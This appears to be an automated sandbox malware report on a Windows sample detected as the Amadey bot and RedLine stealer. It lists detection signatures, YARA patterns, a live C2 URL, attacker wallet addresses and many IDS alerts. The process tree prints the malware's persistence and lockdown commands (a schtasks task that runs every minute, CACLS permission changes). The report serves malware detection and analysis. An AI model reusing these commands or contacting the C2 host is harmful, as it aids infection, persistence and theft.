Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:799407
MD5:61a8c6a50c4a2c2990e45bc223464333
SHA1:87334fa8b57e66c8193d9138f82f31caf2732d73
SHA256:fe010d21711adca99ed52b577c6bf8e2919f5e08f3ce65ce446f1a92f87a7e34
Tags:exe
Infos:

Detection

Amadey, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected Amadey bot
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected Amadeys Clipper DLL
Disable Windows Defender real time protection (registry)
Machine Learning detection for sample
Contains functionality to inject code into remote processes
Uses schtasks.exe or at.exe to add and modify task schedules
Disable Windows Defender notifications (registry)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Uses cacls to modify the permissions of files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • file.exe (PID: 6036 cmdline: C:\Users\user\Desktop\file.exe MD5: 61A8C6A50C4A2C2990E45BC223464333)
    • bjAg.exe (PID: 6052 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe MD5: 014BF36C5CA48AF27042E0BAF0B6D951)
      • ajAf.exe (PID: 6068 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe MD5: A00A64A5A243C8705D68786C6159E402)
      • nika.exe (PID: 1876 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
    • xriv.exe (PID: 4980 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
      • mnolyk.exe (PID: 5752 cmdline: "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
        • schtasks.exe (PID: 5960 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5560 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5012 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 3300 cmdline: CACLS "mnolyk.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 5100 cmdline: CACLS "mnolyk.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cmd.exe (PID: 4148 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 6136 cmdline: CACLS "..\4b9a106e76" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 5224 cmdline: CACLS "..\4b9a106e76" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
        • rundll32.exe (PID: 2552 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • rundll32.exe (PID: 6120 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 1348 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • mnolyk.exe (PID: 4524 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • cleanup
{"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
{"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
      C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
          C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            SourceRuleDescriptionAuthorStrings
            00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
              • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
              00000009.00000002.827863468.0000000000A72000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
                00000002.00000002.414193208.00000000005F7000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
                • 0x1040:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
                00000009.00000002.827977648.0000000000D81000.00000020.00000001.01000000.0000000A.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  Click to see the 16 entries
                  SourceRuleDescriptionAuthorStrings
                  2.2.ajAf.exe.1fc0e67.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    2.2.ajAf.exe.1fc0e67.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                    • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                    • 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                    • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                    • 0x1e9d0:$s5: delete[]
                    • 0x1de88:$s6: constructor or from DllMain.
                    9.2.mnolyk.exe.d80000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      0.3.file.exe.4aa7620.0.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        8.2.xriv.exe.170000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                          Click to see the 12 entries
                          No Sigma rule has matched
                          Timestamp:192.168.2.562.204.41.449780802027700 02/06/23-14:17:06.175418
                          SID:2027700
                          Source Port:49780
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450240802027700 02/06/23-14:19:16.745453
                          SID:2027700
                          Source Port:50240
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449716802027700 02/06/23-14:16:36.096630
                          SID:2027700
                          Source Port:49716
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449814802027700 02/06/23-14:17:21.151914
                          SID:2027700
                          Source Port:49814
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449912802027700 02/06/23-14:17:47.771913
                          SID:2027700
                          Source Port:49912
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449909802027700 02/06/23-14:17:47.051765
                          SID:2027700
                          Source Port:49909
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450237802027700 02/06/23-14:19:16.017120
                          SID:2027700
                          Source Port:50237
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450139802027700 02/06/23-14:18:49.109386
                          SID:2027700
                          Source Port:50139
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450209802027700 02/06/23-14:19:07.475846
                          SID:2027700
                          Source Port:50209
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450175802027700 02/06/23-14:18:59.121879
                          SID:2027700
                          Source Port:50175
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449847802027700 02/06/23-14:17:29.282944
                          SID:2027700
                          Source Port:49847
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449749802027700 02/06/23-14:16:58.580580
                          SID:2027700
                          Source Port:49749
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450016802027700 02/06/23-14:18:16.944191
                          SID:2027700
                          Source Port:50016
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450114802027700 02/06/23-14:18:42.789843
                          SID:2027700
                          Source Port:50114
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450212802027700 02/06/23-14:19:08.785162
                          SID:2027700
                          Source Port:50212
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450273802027700 02/06/23-14:19:24.721440
                          SID:2027700
                          Source Port:50273
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450077802027700 02/06/23-14:18:33.758096
                          SID:2027700
                          Source Port:50077
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450170802027700 02/06/23-14:18:57.930319
                          SID:2027700
                          Source Port:50170
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449945802027700 02/06/23-14:17:57.866706
                          SID:2027700
                          Source Port:49945
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449839802027700 02/06/23-14:17:27.377568
                          SID:2027700
                          Source Port:49839
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450167802027700 02/06/23-14:18:57.212252
                          SID:2027700
                          Source Port:50167
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450072802027700 02/06/23-14:18:31.495683
                          SID:2027700
                          Source Port:50072
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450049802027700 02/06/23-14:18:24.878641
                          SID:2027700
                          Source Port:50049
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450008802027700 02/06/23-14:18:14.977537
                          SID:2027700
                          Source Port:50008
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450204802027700 02/06/23-14:19:06.078376
                          SID:2027700
                          Source Port:50204
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449744802027700 02/06/23-14:16:57.374562
                          SID:2027700
                          Source Port:49744
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449940802027700 02/06/23-14:17:56.613135
                          SID:2027700
                          Source Port:49940
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449998802027700 02/06/23-14:18:10.629964
                          SID:2027700
                          Source Port:49998
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449752802027700 02/06/23-14:16:59.309366
                          SID:2027700
                          Source Port:49752
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449822802027700 02/06/23-14:17:23.172087
                          SID:2027700
                          Source Port:49822
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450150802027700 02/06/23-14:18:53.180275
                          SID:2027700
                          Source Port:50150
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450080802027700 02/06/23-14:18:34.462036
                          SID:2027700
                          Source Port:50080
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449870802027700 02/06/23-14:17:37.486432
                          SID:2027700
                          Source Port:49870
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450044802027700 02/06/23-14:18:23.661387
                          SID:2027700
                          Source Port:50044
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449917802027700 02/06/23-14:17:48.955073
                          SID:2027700
                          Source Port:49917
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450245802027700 02/06/23-14:19:17.964918
                          SID:2027700
                          Source Port:50245
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449875802027700 02/06/23-14:17:38.674670
                          SID:2027700
                          Source Port:49875
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449757802027700 02/06/23-14:17:00.537791
                          SID:2027700
                          Source Port:49757
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450024802027700 02/06/23-14:18:18.856589
                          SID:2027700
                          Source Port:50024
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450085802027700 02/06/23-14:18:35.682373
                          SID:2027700
                          Source Port:50085
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449867802027700 02/06/23-14:17:36.742778
                          SID:2027700
                          Source Port:49867
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450195802027700 02/06/23-14:19:03.888104
                          SID:2027700
                          Source Port:50195
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449711802027700 02/06/23-14:16:33.781093
                          SID:2027700
                          Source Port:49711
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449895802027700 02/06/23-14:17:43.567435
                          SID:2027700
                          Source Port:49895
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449965802027700 02/06/23-14:18:02.723607
                          SID:2027700
                          Source Port:49965
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450122802027700 02/06/23-14:18:44.731116
                          SID:2027700
                          Source Port:50122
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450232802027700 02/06/23-14:19:14.756016
                          SID:2027700
                          Source Port:50232
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449729802027700 02/06/23-14:16:44.339849
                          SID:2027700
                          Source Port:49729
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449981802027700 02/06/23-14:18:06.537805
                          SID:2027700
                          Source Port:49981
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450229802027700 02/06/23-14:19:14.024750
                          SID:2027700
                          Source Port:50229
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450057802027700 02/06/23-14:18:26.865834
                          SID:2027700
                          Source Port:50057
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449904802027700 02/06/23-14:17:45.863998
                          SID:2027700
                          Source Port:49904
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449732802027700 02/06/23-14:16:48.097239
                          SID:2027700
                          Source Port:49732
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449830802027700 02/06/23-14:17:25.114847
                          SID:2027700
                          Source Port:49830
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449986802027700 02/06/23-14:18:07.762955
                          SID:2027700
                          Source Port:49986
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450265802027700 02/06/23-14:19:22.827156
                          SID:2027700
                          Source Port:50265
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449937802027700 02/06/23-14:17:55.913689
                          SID:2027700
                          Source Port:49937
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449862802027700 02/06/23-14:17:34.385168
                          SID:2027700
                          Source Port:49862
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450060802027700 02/06/23-14:18:27.627658
                          SID:2027700
                          Source Port:50060
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450190802027700 02/06/23-14:19:02.698642
                          SID:2027700
                          Source Port:50190
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449695802027700 02/06/23-14:16:29.833366
                          SID:2027700
                          Source Port:49695
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449978802027700 02/06/23-14:18:05.789921
                          SID:2027700
                          Source Port:49978
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449724802027700 02/06/23-14:16:39.798184
                          SID:2027700
                          Source Port:49724
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450011802027700 02/06/23-14:18:15.710647
                          SID:2027700
                          Source Port:50011
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450224802027700 02/06/23-14:19:12.834482
                          SID:2027700
                          Source Port:50224
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450052802027700 02/06/23-14:18:25.625284
                          SID:2027700
                          Source Port:50052
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450159802027700 02/06/23-14:18:55.306572
                          SID:2027700
                          Source Port:50159
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449765802027700 02/06/23-14:17:02.563683
                          SID:2027700
                          Source Port:49765
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450029802027700 02/06/23-14:18:20.040672
                          SID:2027700
                          Source Port:50029
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450130802027700 02/06/23-14:18:46.681001
                          SID:2027700
                          Source Port:50130
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450260802027700 02/06/23-14:19:21.606828
                          SID:2027700
                          Source Port:50260
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449932802027700 02/06/23-14:17:53.704513
                          SID:2027700
                          Source Port:49932
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449890802027700 02/06/23-14:17:42.348322
                          SID:2027700
                          Source Port:49890
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449802802027700 02/06/23-14:17:18.144256
                          SID:2027700
                          Source Port:49802
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449760802027700 02/06/23-14:17:01.327724
                          SID:2027700
                          Source Port:49760
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449973802027700 02/06/23-14:18:04.598157
                          SID:2027700
                          Source Port:49973
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449728802027700 02/06/23-14:16:43.785940
                          SID:2027700
                          Source Port:49728
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449985802027700 02/06/23-14:18:07.516141
                          SID:2027700
                          Source Port:49985
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449731802027700 02/06/23-14:16:47.855991
                          SID:2027700
                          Source Port:49731
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449798802027700 02/06/23-14:17:17.167240
                          SID:2027700
                          Source Port:49798
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449887802027700 02/06/23-14:17:41.597625
                          SID:2027700
                          Source Port:49887
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450249802027700 02/06/23-14:19:18.949648
                          SID:2027700
                          Source Port:50249
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449896802027700 02/06/23-14:17:43.821533
                          SID:2027700
                          Source Port:49896
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449737802027700 02/06/23-14:16:52.313327
                          SID:2027700
                          Source Port:49737
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450252802027700 02/06/23-14:19:19.663270
                          SID:2027700
                          Source Port:50252
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449826802027700 02/06/23-14:17:24.159355
                          SID:2027700
                          Source Port:49826
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450163802027700 02/06/23-14:18:56.264797
                          SID:2027700
                          Source Port:50163
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450191802027700 02/06/23-14:19:02.948025
                          SID:2027700
                          Source Port:50191
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450261802027700 02/06/23-14:19:21.842035
                          SID:2027700
                          Source Port:50261
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450093802027700 02/06/23-14:18:37.648522
                          SID:2027700
                          Source Port:50093
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449859802027700 02/06/23-14:17:33.007738
                          SID:2027700
                          Source Port:49859
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450004802027700 02/06/23-14:18:13.908824
                          SID:2027700
                          Source Port:50004
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450102802027700 02/06/23-14:18:39.827581
                          SID:2027700
                          Source Port:50102
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450258802027700 02/06/23-14:19:21.108804
                          SID:2027700
                          Source Port:50258
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450089802027700 02/06/23-14:18:36.683035
                          SID:2027700
                          Source Port:50089
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449960802027700 02/06/23-14:18:01.488614
                          SID:2027700
                          Source Port:49960
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449868802027700 02/06/23-14:17:36.986362
                          SID:2027700
                          Source Port:49868
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449709802027700 02/06/23-14:16:33.287572
                          SID:2027700
                          Source Port:49709
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449703802027700 02/06/23-14:16:31.801911
                          SID:2027700
                          Source Port:49703
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449810802027700 02/06/23-14:17:20.127758
                          SID:2027700
                          Source Port:49810
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
